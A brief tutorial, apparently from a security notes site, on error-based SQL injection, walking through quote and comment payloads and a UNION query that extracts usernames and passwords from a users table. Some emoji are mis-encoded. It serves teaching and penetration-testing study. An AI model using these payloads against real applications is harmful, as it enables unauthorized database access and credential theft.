Error-based SQLi
Error-based is the simplest SQL injection. It's an injection in which DBMS errors are displayed to the user.
The hacker can easily use the output to tweak the payload until they get what they want.
Error-based SQLi Explained
- We usually start with injecting a quote
':
Select name,desc from product where name LIKE '%'%'
β οΈ The query fails because of the syntax is invalid, due to the trailing "%'", but we now know that an injection is possible.
- We then comment out the rest of the query using
' --.
Select name,desc from product where name LIKE '%' --%'
β οΈ The code above may not work in some DBMS, because they want a space between the start of a comment, and the comment itself.
- We add a space giving us the payload
' -- -
Select name,desc from product where name LIKE '%' -- -%'
β
Between ' and -- -, we can write any SQL code, through the syntax of the final query must be valid βοΈ.
For instance, we could use xxx' UNION Select username,password FROM users -- - to get the list of usernames/passwords.
Select name,desc from product where name LIKE '%' UNION Select username,password FROM users -- -%'
Refers to union-based payloads.